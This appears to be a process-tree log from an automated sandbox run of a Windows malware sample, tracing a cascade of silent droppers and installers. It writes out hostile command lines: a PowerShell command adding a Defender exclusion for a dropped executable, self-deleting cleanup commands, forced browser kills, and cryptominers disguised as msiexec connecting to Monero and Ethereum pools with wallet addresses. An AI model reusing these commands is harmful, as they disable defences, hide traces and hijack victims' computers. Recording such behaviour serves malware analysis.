C:\Users\Admin\AppData\Local\Temp\e6c5ba2b-1ab9-4ed3-9675-e6d49ac04572\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e6c5ba2b-1ab9-4ed3-9675-e6d49ac04572\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e6c5ba2b-1ab9-4ed3-9675-e6d49ac04572\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run15⤵PID:7120
-
C:\Users\Admin\AppData\Local\Temp\e6c5ba2b-1ab9-4ed3-9675-e6d49ac04572\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e6c5ba2b-1ab9-4ed3-9675-e6d49ac04572\AdvancedRun.exe" /SpecialRun 4101d8 712016⤵PID:9400
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force15⤵PID:10024
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Executes dropped EXE
PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 115⤵PID:4264
-
C:\Windows\SysWOW64\timeout.exetimeout 116⤵
- Delays execution with timeout.exe
PID:9696
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"15⤵PID:5892
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:8368
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"15⤵PID:10076
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wj5wcdhad2r\vict.exe"C:\Users\Admin\AppData\Local\Temp\wj5wcdhad2r\vict.exe" /VERYSILENT /id=53513⤵PID:8908
-
C:\Users\Admin\AppData\Local\Temp\is-U5IJK.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-U5IJK.tmp\vict.tmp" /SL5="$60340,870426,780800,C:\Users\Admin\AppData\Local\Temp\wj5wcdhad2r\vict.exe" /VERYSILENT /id=53514⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\is-F5N4F.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-F5N4F.tmp\win1host.exe" 53515⤵PID:8460
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Z86MEE2WFQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z86MEE2WFQ\setups.exe" ll10⤵PID:7984
-
C:\Users\Admin\AppData\Local\Temp\is-JI4B7.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-JI4B7.tmp\setups.tmp" /SL5="$80200,454998,229376,C:\Users\Admin\AppData\Local\Temp\Z86MEE2WFQ\setups.exe" ll11⤵PID:9064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:744
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:4884
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:7604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"9⤵PID:7360
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"10⤵PID:7128
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install11⤵PID:9028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:8328
-
C:\Users\Admin\AppData\Roaming\3887.tmp.exe"C:\Users\Admin\AppData\Roaming\3887.tmp.exe"10⤵PID:4176
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:7512
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Roaming\3E45.tmp.exe"C:\Users\Admin\AppData\Roaming\3E45.tmp.exe"10⤵PID:7824
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\3E45.tmp.exe11⤵PID:7576
-
C:\Windows\SysWOW64\timeout.exetimeout /t 312⤵
- Delays execution with timeout.exe
PID:5620
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:2640
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:8476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:6264
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4bc043x.0da\app.exe /8-2222 & exit7⤵PID:2060
-
C:\Users\Admin\AppData\Local\Temp\q4bc043x.0da\app.exeC:\Users\Admin\AppData\Local\Temp\q4bc043x.0da\app.exe /8-22228⤵PID:3668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhf0kk0x.qlv\Four.exe & exit7⤵PID:8732
-
C:\Users\Admin\AppData\Local\Temp\nhf0kk0x.qlv\Four.exeC:\Users\Admin\AppData\Local\Temp\nhf0kk0x.qlv\Four.exe8⤵PID:7508
-
C:\Users\Admin\AppData\Local\Temp\28GHL7OYH0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\28GHL7OYH0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:9252
-
C:\Users\Admin\AppData\Local\Temp\28GHL7OYH0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\28GHL7OYH0\multitimer.exe" 1 3.1617537688.6069aa988bacf 10410⤵PID:8580
-
C:\Users\Admin\AppData\Local\Temp\28GHL7OYH0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\28GHL7OYH0\multitimer.exe" 2 3.1617537688.6069aa988bacf11⤵PID:9924
-
C:\Users\Admin\AppData\Local\Temp\1en3ecre3gc\nxdy42hlzny.exe"C:\Users\Admin\AppData\Local\Temp\1en3ecre3gc\nxdy42hlzny.exe" /ustwo INSTALL12⤵PID:6792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nxdy42hlzny.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1en3ecre3gc\nxdy42hlzny.exe" & exit13⤵PID:7708
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nxdy42hlzny.exe" /f14⤵
- Kills process with taskkill
PID:7680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\clnh4emmhix\vict.exe"C:\Users\Admin\AppData\Local\Temp\clnh4emmhix\vict.exe" /VERYSILENT /id=53512⤵PID:9824
-
C:\Users\Admin\AppData\Local\Temp\is-PJ3CS.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-PJ3CS.tmp\vict.tmp" /SL5="$4065C,870426,780800,C:\Users\Admin\AppData\Local\Temp\clnh4emmhix\vict.exe" /VERYSILENT /id=53513⤵PID:4132
-
C:\Users\Admin\AppData\Local\Temp\is-3967G.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-3967G.tmp\win1host.exe" 53514⤵PID:8120
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vtolxaf1ps5\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\vtolxaf1ps5\cpyrix.exe" /VERYSILENT12⤵PID:1928
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵PID:4152
-
C:\Users\Admin\AppData\Local\Temp\97f61cd2-2a4c-4a72-a27f-fbc749567fa6\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\97f61cd2-2a4c-4a72-a27f-fbc749567fa6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\97f61cd2-2a4c-4a72-a27f-fbc749567fa6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run14⤵PID:10120
-
C:\Users\Admin\AppData\Local\Temp\97f61cd2-2a4c-4a72-a27f-fbc749567fa6\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\97f61cd2-2a4c-4a72-a27f-fbc749567fa6\AdvancedRun.exe" /SpecialRun 4101d8 1012015⤵PID:8356
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force14⤵PID:8664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 114⤵PID:9320
-
C:\Windows\SysWOW64\timeout.exetimeout 115⤵
- Delays execution with timeout.exe
PID:8748
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"14⤵PID:356
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵PID:7488
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"14⤵PID:2968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abl4j3xevqc\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\abl4j3xevqc\Setup3310.exe" /Verysilent /subid=57712⤵PID:10132
-
C:\Users\Admin\AppData\Local\Temp\is-M6L3Q.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-M6L3Q.tmp\Setup3310.tmp" /SL5="$60730,138429,56832,C:\Users\Admin\AppData\Local\Temp\abl4j3xevqc\Setup3310.exe" /Verysilent /subid=57713⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\is-8EF3D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8EF3D.tmp\Setup.exe" /Verysilent14⤵PID:4068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\budowpwvlwh\app.exe"C:\Users\Admin\AppData\Local\Temp\budowpwvlwh\app.exe" /8-2312⤵PID:5860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Z227ODIK6Q\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z227ODIK6Q\setups.exe" ll9⤵PID:9572
-
C:\Users\Admin\AppData\Local\Temp\is-TALRM.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-TALRM.tmp\setups.tmp" /SL5="$306C6,454998,229376,C:\Users\Admin\AppData\Local\Temp\Z227ODIK6Q\setups.exe" ll10⤵PID:9788
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:1364
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:6392
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:6640
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:4156
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:7028
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:6316
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"3⤵PID:5796
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:6196
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:5916
-
C:\Users\Admin\AppData\Local\Temp\Q903G63VZZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Q903G63VZZ\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:6800
-
C:\Users\Admin\AppData\Local\Temp\Q903G63VZZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Q903G63VZZ\multitimer.exe" 1 3.1617537437.6069a99de6186 1035⤵PID:6684
-
C:\Users\Admin\AppData\Local\Temp\Q903G63VZZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Q903G63VZZ\multitimer.exe" 2 3.1617537437.6069a99de61866⤵PID:6852
-
C:\Users\Admin\AppData\Local\Temp\kj10o2gu21m\vict.exe"C:\Users\Admin\AppData\Local\Temp\kj10o2gu21m\vict.exe" /VERYSILENT /id=5357⤵PID:7836
-
C:\Users\Admin\AppData\Local\Temp\is-7E8ST.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-7E8ST.tmp\vict.tmp" /SL5="$7031A,870426,780800,C:\Users\Admin\AppData\Local\Temp\kj10o2gu21m\vict.exe" /VERYSILENT /id=5358⤵PID:7988
-
C:\Users\Admin\AppData\Local\Temp\is-M9Q09.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-M9Q09.tmp\win1host.exe" 5359⤵PID:7268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lqjihnal0kw\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\lqjihnal0kw\cpyrix.exe" /VERYSILENT7⤵PID:7844
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:8584
-
C:\Users\Admin\AppData\Local\Temp\8cfbe678-608b-41a4-9c6a-1c2e7e350b94\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8cfbe678-608b-41a4-9c6a-1c2e7e350b94\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8cfbe678-608b-41a4-9c6a-1c2e7e350b94\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:9172
-
C:\Users\Admin\AppData\Local\Temp\8cfbe678-608b-41a4-9c6a-1c2e7e350b94\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8cfbe678-608b-41a4-9c6a-1c2e7e350b94\AdvancedRun.exe" /SpecialRun 4101d8 917210⤵PID:8304
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force9⤵PID:8576
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 19⤵PID:8668
-
C:\Windows\SysWOW64\timeout.exetimeout 110⤵
- Delays execution with timeout.exe
PID:6072
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"9⤵PID:7952
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:8704
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵PID:7696
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵PID:3240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\knwjhek40ce\vpn.exe"C:\Users\Admin\AppData\Local\Temp\knwjhek40ce\vpn.exe" /silent /subid=4827⤵PID:7920
-
C:\Users\Admin\AppData\Local\Temp\is-GC41U.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-GC41U.tmp\vpn.tmp" /SL5="$2043E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\knwjhek40ce\vpn.exe" /silent /subid=4828⤵PID:8136
-
-
-
C:\Users\Admin\AppData\Local\Temp\kh2b1qabrei\s1py3nxbhcj.exe"C:\Users\Admin\AppData\Local\Temp\kh2b1qabrei\s1py3nxbhcj.exe" /ustwo INSTALL7⤵PID:7904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "s1py3nxbhcj.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kh2b1qabrei\s1py3nxbhcj.exe" & exit8⤵PID:7536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "s1py3nxbhcj.exe" /f9⤵
- Kills process with taskkill
PID:6620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\shz2mvp5hsz\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\shz2mvp5hsz\Setup3310.exe" /Verysilent /subid=5777⤵PID:7968
-
C:\Users\Admin\AppData\Local\Temp\is-HQF85.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-HQF85.tmp\Setup3310.tmp" /SL5="$20444,138429,56832,C:\Users\Admin\AppData\Local\Temp\shz2mvp5hsz\Setup3310.exe" /Verysilent /subid=5778⤵PID:8144
-
C:\Users\Admin\AppData\Local\Temp\is-VT2C0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VT2C0.tmp\Setup.exe" /Verysilent9⤵PID:6920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\x4nk5r12v22\app.exe"C:\Users\Admin\AppData\Local\Temp\x4nk5r12v22\app.exe" /8-237⤵PID:6804
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\16PKK2JDWC\setups.exe"C:\Users\Admin\AppData\Local\Temp\16PKK2JDWC\setups.exe" ll4⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\is-4S83P.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-4S83P.tmp\setups.tmp" /SL5="$40356,454998,229376,C:\Users\Admin\AppData\Local\Temp\16PKK2JDWC\setups.exe" ll5⤵PID:2004
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:4672
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5804
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B151616B7E268BECE1279F8C024F9745 C2⤵PID:5272
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 222EBD9AE239032398F39E66AA726B2A2⤵PID:6956
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:6376
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:6940
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6428
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6372
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7064
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7316
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8740
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:3704
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6266f526-1a3d-4940-94e4-05716e5bf07c}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7508
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000013C"2⤵PID:8596
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7512
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4280
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4792
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7744
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7616
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:9648
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8956
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4652
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5592
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8416
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\12520586a92d49c9bfbb88968b481548 /t 6424 /p 55921⤵PID:6200
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\a8b6b730770d433995d2e77a132b9972 /t 7464 /p 84161⤵PID:6340
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8688
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b71d06294ba5440d9e46d645a6dbe111 /t 8288 /p 86881⤵PID:9976
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9276
-
C:\Users\Admin\AppData\Local\Temp\6290.exeC:\Users\Admin\AppData\Local\Temp\6290.exe1⤵PID:2120
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9628
-
C:\Users\Admin\AppData\Local\Temp\6C84.exeC:\Users\Admin\AppData\Local\Temp\6C84.exe1⤵PID:4836
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\A45D.exeC:\Users\Admin\AppData\Local\Temp\A45D.exe1⤵PID:8436
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A45D.exe"2⤵PID:7464
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:7676
-
-
-
C:\Users\Admin\AppData\Local\Temp\CB01.exeC:\Users\Admin\AppData\Local\Temp\CB01.exe1⤵PID:7184
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im CB01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CB01.exe" & del C:\ProgramData\*.dll & exit2⤵PID:3464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im CB01.exe /f3⤵
- Kills process with taskkill
PID:6684
-
-
-
C:\Users\Admin\AppData\Local\Temp\EFA1.exeC:\Users\Admin\AppData\Local\Temp\EFA1.exe1⤵PID:4792
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6404
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7944
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8208
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7300
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9920
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7888
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9972
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6932
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8672
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9528
-
